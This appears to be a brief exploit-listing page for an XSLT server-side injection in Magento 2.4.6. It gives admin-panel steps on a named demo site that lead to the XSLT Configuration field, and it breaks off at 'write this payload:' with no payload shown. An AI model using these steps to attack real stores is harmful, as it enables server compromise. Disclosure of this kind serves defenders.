Magento ver. 2.4.6 xslt server side injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2024-03-03 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Magento ver. 2.4.6 xslt server side injection is for educational purposes only and if it is used you will do on your own risk!
1. Enter with admin credentials to this URL: [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)
2. Click `SYSTEM > Import Jobs > Entity Type Widget > click edit`
3. Choose Import Source is File
4. Click `XSLT Configuration` and write this payload: